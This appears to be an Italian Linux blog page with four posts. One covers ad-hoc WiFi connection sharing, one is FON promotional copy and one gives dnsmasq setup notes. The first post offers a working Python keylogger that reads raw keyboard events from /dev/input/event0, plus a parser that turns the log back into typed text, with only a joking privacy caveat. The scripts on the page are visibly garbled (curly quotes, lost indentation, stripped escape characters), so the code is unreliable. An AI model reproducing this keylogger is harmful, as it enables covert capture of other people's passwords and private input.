Post  |  Commenti

Post più letti

19th
MAG

Keylogger in python per linux

1 Star2 Stars3 Stars4 Stars5 Stars (Nessun voto)
Loading ... Loading ...

Posted by RedSend | Filed under Linux

Due script per effettuare il keylogger sulla proprio linux-box.
Prima di lanciare gli script, assicurarsi che il modulo evdev sia incluso nel kernel oppure che sia compilato come modulo, in questo caso bisogna caricarlo con:

# modprobe evdev

Passiamo agli script.

keylog.py

#!/usr/bin/env python

DEV = ‘/dev/input/event0′
#if event0 doesn’t work, try event1
#DEV = ‘/dev/input/event1′

fo = open(DEV)

def interpret(keycode,state):
if state == 0:
print ‘%i up’%keycode
if state == 1:
print ‘%i down’%keycode
if state == 2:
print ‘%i repeat’%keycode

while 1:
line = fo.read(16)
if ord(line[10]) != 0:
keycode,state = line[10],line[12]
interpret(ord(keycode),ord(state))

Questo script effettua il log di tutti i tasti premuti sulla tastiera, recuperando queste informazioni dal device /dev/input/event0, come viene commentato anche nello script nel caso non dovesse funzionare cambiate il dispositivo inserendo quello giusto.

Per lanciare lo script date il comando

# python -i keylog.py > keys.logfile

in questo modo nel file keys.logfile avremo tutte le informazioni…

Il secondo script invece viene utilizzato per fare il parsing del file prodotto da keylog.py e visualizzare le informazioni in maniera comprensibile all’uomo non dotato di particolare poteri matrixiani.

keylog_read.py

#!/usr/bin/env python
import re
import os
import sys

dumpkeys = os.popen(’dumpkeys’).readlines()

keyre = re.compile(’keycode[s]*([0-9]*) = ([S]*)’)

dict = {}
for line in dumpkeys:
result = keyre.search(line)
if result:
keycode,char = result.groups()
dict.update({keycode:char})

fo = open(sys.argv[1])
lines = fo.readlines()

def interpret(char,state):
sdict = {’Meta_greater’:’.’,
‘Meta_less’:',’,
‘Meta_Control_m’:'n’}
odict = {’Meta_nul’:’ ‘}
if len(char) == 1:
if state != ‘upn’:
return char
elif sdict.has_key(char):
return sdict[char]
elif odict.has_key(char):
if state != ‘upn’:
return odict[char]
else:
if state == ‘upn’:
return ‘‘%char
elif state == ‘downn’:
return ‘<%s>‘%char

return ”

for line in lines:
keycode,state = line.split(’ ‘)
char = dict[keycode]
sys.stdout.write(interpret(char,state))

Per lanciare lo script date il comando

# python -i keylog_read.py keys.logfile

Lo script dovrebbe visualizzarvi tutti i caratteri digitati, con tanto di tag nel caso di caratteri speciali, come in questo esempio…

now i am going to type some stuff so you can see w
hat the interpreted stuff looks like.. im ete>m going to paste i
t in right here now i guess…… alright here goes.. ]

Nel caso vi dia un errore, come è capitato a me, è perchè il file keys.logfile contiene nella prima riga dei caratteri strani, quindi aprite il file e cancellate la prima riga e ridate il comando. Tutto dovrebbe funzionare…

Mi raccomando di utilizzare questi script nel rispetto della privacy altrui ;-)

Link:
http://forums.gentoo.org

ps: grazie a kgraehl

Tags:

17th
MAG

Condividere la connessione ad Internet tramite una connessione wireless Ad-Hoc

1 Star2 Stars3 Stars4 Stars5 Stars (Nessun voto)
Loading ... Loading ...

Posted by RedSend | Filed under Linux

Di seguito riporto uno script che permette di condividere la proprio connessione ad internet attraverso una connessione wireless in modalità Ad-Hoc:

#!/bin/bash#########################
# Configurazione #
#########################

ETHIF=eth0
WIFIIF=eth1

ESSID=shared
WEP_KEY=unisa

WIFIIP=”192.168.0.1″

#########################
# Fine Configurazione #
#########################

# Programmi utilizzati

IPTABLES=/sbin/iptables
IWCONFIG=/sbin/iwconfig
IFCONFIG=/sbin/ifconfig
MODPROBE=/sbin/modprobe
AWK=/bin/awk

EXTIP=”`${IFCONFIG} ${ETHIF} | ${AWK} /${ETHIF}/’{next}//{split($0,a,”:”);split(a[2],a,” “);print a[1];exit}’`”

# Configurazione scheda wireless

echo “Sto configurando la scheda wireless in modalità Ad-Hoc con essid $ESSID…”
${IWCONFIG} ${WIFIIF} mode ad-hoc essid ${ESSID} channel 11 enc open key s:${WEP_KEY} txpower 20mW

echo “Attivo l’interfaccia di rete wireless…”
${IFCONFIG} ${WIFIIF} ${WIFIIP}

# Pulitura IpTables

echo “Sto resettando le tabelle e le catene di default…”
${IPTABLES} -F
${IPTABLES} -t nat -F
${IPTABLES} -t mangle -F

echo “Sto cancellando le catene definite dall’utente…”
${IPTABLES} -X
${IPTABLES} -Z

echo “Imposto i target per le chain di default su ACCEPT…”
${IPTABLES} -P INPUT ACCEPT
${IPTABLES} -P OUTPUT ACCEPT
${IPTABLES} -P FORWARD ACCEPT

echo “Imposto la regola per il POSTROUTING…”
${IPTABLES} -t nat -A POSTROUTING -o ${ETHIF} -j SNAT –to ${EXTIP}

echo “Abilita il forwarding dei pacchetti dall’interno verso l’esterno…”
${IPTABLES} -A FORWARD -i ${WIFIIF} -o ${ETHIF} -j ACCEPT
echo “1″ > /proc/sys/net/ipv4/ip_forward

Scaricalo quì per evitare problemi di codifica dei caratteri.

Lo script necessita di una minima configurazione, essenziali sono da controllare le interfacce delle schede di rete, in particolare bisogna assegnare alla variabile ETHIF il nome dell’interfaccia Ethernet e a quella WIFIIF il nome di quella wireless.
Poi bisonga scegliere l’ESSID da assegnare alla rete Ad-Hoc che si andrà a creare e la password wep per una connessione cifrata e sicura (diciamo!!!).

Dopo queste quattro variabili si può provare a lanciare lo script, ovviamente con i permessi di root, nel caso di problemi si può verificare il proprio problema continuando a controllare lo script e osservando a che punto si blocca facendo riferimento ad i messaggi stampati. Un possibile errore lo si potrebbe avere con il path dei programmi utilizzati anche se nellastragrande maggioranza delle distribuzione non cambia.
Poi si potrebbe controllare se si ha iptables installato e se si ha il supporto all’interno del kernel, ma anche questo nelle moderne distro è inserito per default.

Una volta lanciato lo script, si ha una connessione wireless Ad-Hoc attiva con l’essid specificato nella configurazione e con ip 192.168.0.1, ora sui client basta inserire le informazioni necessarie configurando la scheda con le impostazioni statiche ed in particolare inserendo il DNS che si sta utilizzando sulla connessione ad Internet, non il proprio pc.
Se proprio si vuole fare gli sboroni si può pensare di utilizzare anche un server DNS e DHCP in modo da rendere molto più semplice la connessione di un nuovo client. Per fare ciò consiglio di utilizzare dnsmasq e far riferimento a questo post per installazione e configurazione.

Per suggerimenti e problemi lasciate un commento.

Tags:

16th
MAG

FON is the largest WIFI community in the world

1 Star2 Stars3 Stars4 Stars5 Stars (Nessun voto)
Loading ... Loading ...

Posted by RedSend | Filed under Varie

Cos’è FON…

FON è la più grande Community WiFi nel mondo. I nostri membri condividono il proprio accesso Internet wireless di casa e, in cambio, si connettono gratuitamente WiFi ovunque trovino un Access Point di un altro Fonero.

FON è la più grande Community WiFi nel mondo. I nostri membri condividono il proprio accesso Internet wireless di casa e, in cambio, si connettono gratuitamente WiFi ovunque trovino un Access Point di un altro Fonero.

I membri della Community Fon si chiamano Foneros. Diventare Fonero è semplice. Devi solo comprare La Fonera, che ti permette di condividere in sicurezza il tuo collegamento a banda larga di casa con gli altri Foneros.

Perciò quando sei lontano da casa ed hai bisogno di accedere ad Internet, devi semplicemente effettuare il Login in un Access Point FON e potrai navigare in Internet gratis. Non dovrai portare con te il tuo router, ma solo ricordare il tuo login e password di Fonero.

Visita le nostre Mappe per trovare i migliaia di access point FON in tutto il mondo.

Mentre il mondo del WiFi si espande, potrai fare sempre più cose gratuitamente. Per esempio, presto lanceremo lo Skype FON è un apparecchio WiFi che ti permette di fare telefonate via Internet da qualsiasi Access Point FON.

Entra a far parte subito della Community FON: ordina La Fonera – il Router FON.
Che cosa significa essere un Fonero?

I Foneros sono i membri della Community di FON. Ci sono tre tipi di Fonero:

  • La maggior parte di noi sono Linus: condividiamo il nostro WiFi di casa e in cambio abbiamo accesso gratuito WiFi ovunque troviamo un Access Point FON.
  • Gli Alien sono coloro che non condividono ancora il loro WiFi. Pagano solo 3 ¤/$ al giorno per connettersi ad un Access Point FON.
  • I Bills preferiscono guadagnare dal loro WiFi. Invece di navigare gratis, ricevono il 50% dei soldi che gli Alien pagano per accedere al loro Access Point FON. Possono anche fare pubblicità alla loro attività sulla loro homepage personalizzata dell’Access Point FON.

Cos’è La Fonera?

La Fonera è il nostro router WiFi.

Un router WiFi è un prodotto che trasforma il tuo collegamento Internet a banda larga in un Access Point WiFi. Questo significa che puoi connettere il tuo laptop o la tua console giochi portatile ad Internet senza collegare fili, in modo da poterti muovere liberamente per casa. Sempre più dispositivi sono WiFi! La Fonera supporta gli standard 802.11b e 802.11g.

La Fonera è un tipo speciale di router WiFi. La denominiamo Router Sociale. Questo perchè quando attivi la tua Fonera, diventi parte della Community FON. I membri della Community FON condividono il loro WiFi di casa e in cambio ottengono WiFi gratis ovunque trovino un Access Point FON.

La Fonera è un Router sociale anche perchè puoi personalizzare la pagina che gli altri Foneros vedono quando entrano dal tuo access point FON. Così puoi comunicare agli altri qualcosa di te o della tua zona, o semplicemente salutarli.

Link:
http://www.fon.com/

Le informazioni del post sono state recuperate dalla seguente pagina http://www.fon.com/it/info/whatsFon

Tags:

15th
MAG

Dnsmasq — lightweight, easy to configure DNS forwarder and DHCP server

1 Star2 Stars3 Stars4 Stars5 Stars (Nessun voto)
Loading ... Loading ...

Posted by RedSend | Filed under Linux

Dnsmasq è un leggerissimo server DNS, TFTP e DHCP. Ha lo scopo di fornire un servizio di DNS e DHCP su una rete LAN di piccole dimensioni (fino a 1000 client è consigliato, alla faccia della piccola rete).

Dnsmasq accetta query dns e risponde utilizzando una piccola cache locale oppure può inoltrare la richiesta ad un vero server DNS. Di default carica il contenuto dal file /etc/hosts per risolvere i nomi degli host locali che non appaiono nel DNS globale.

Il server DHCP fornito nel pacchetto supporta un assegnamento statico agli host, reti multiple, DHCP-relay e RFC3011 subnet specifiers. Provvede ad inviare numero impostazioni di default del DHCP, tutte configurabili a piacimento nel file di configurazione /etc/dnsmasq.conf. Il server include un server TFTP sicuro e read-only per consentire il boot net/PXE di host DHCP. Supporta anche BOOTP.

Infine supporta IPv6 per le query DNS ma non per il DHCP. Il pacchetto è incluso in numerose distribuzioni linux, tra cui gentoo (ovviamente!!) e soprattuto, grazie alla sua leggerezza, viene utilizzato in molti router Lynksys.

La confiugurazione di default che si trova nel file /etc/dnsmasq.conf è più che sufficiente per un funzionamento di base del servizio. Nello stesso file sono riportate tutte le possibili opzioni con tanto di commento ed esmpi di utilizzo. Quelle che mi è sembrato opportuno modificare sono poche, come ad esempio

  • no-hosts — per impedirgli di leggere il file /etc/hosts
  • dhcp-range=192.168.0.2,192.168.0.200,12h — per impostare il range degli ip che il DHCP assegnerà
  • no-dhcp-interface=eth0 — per impedire di mettere in ascolto il server DHCP sul’interfaccia eth0

per il resto non ho toccato nulla perchè o andava bene il default o non sapevo cosa adavano a cambiare e quindi ho evitato di creare casini :-)

Per avviare il servizio basta dare il comando

# /etc/init.d/dnsmasq start

Per testare il corretto funzionamento del server potete utilizzare molti programmi, tra cui dig, nslookup oppure un front-end grafico per le query dns che si chiama dnsquery.

link:
http://www.thekelleys.org.uk/dnsmasq/doc.html
http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html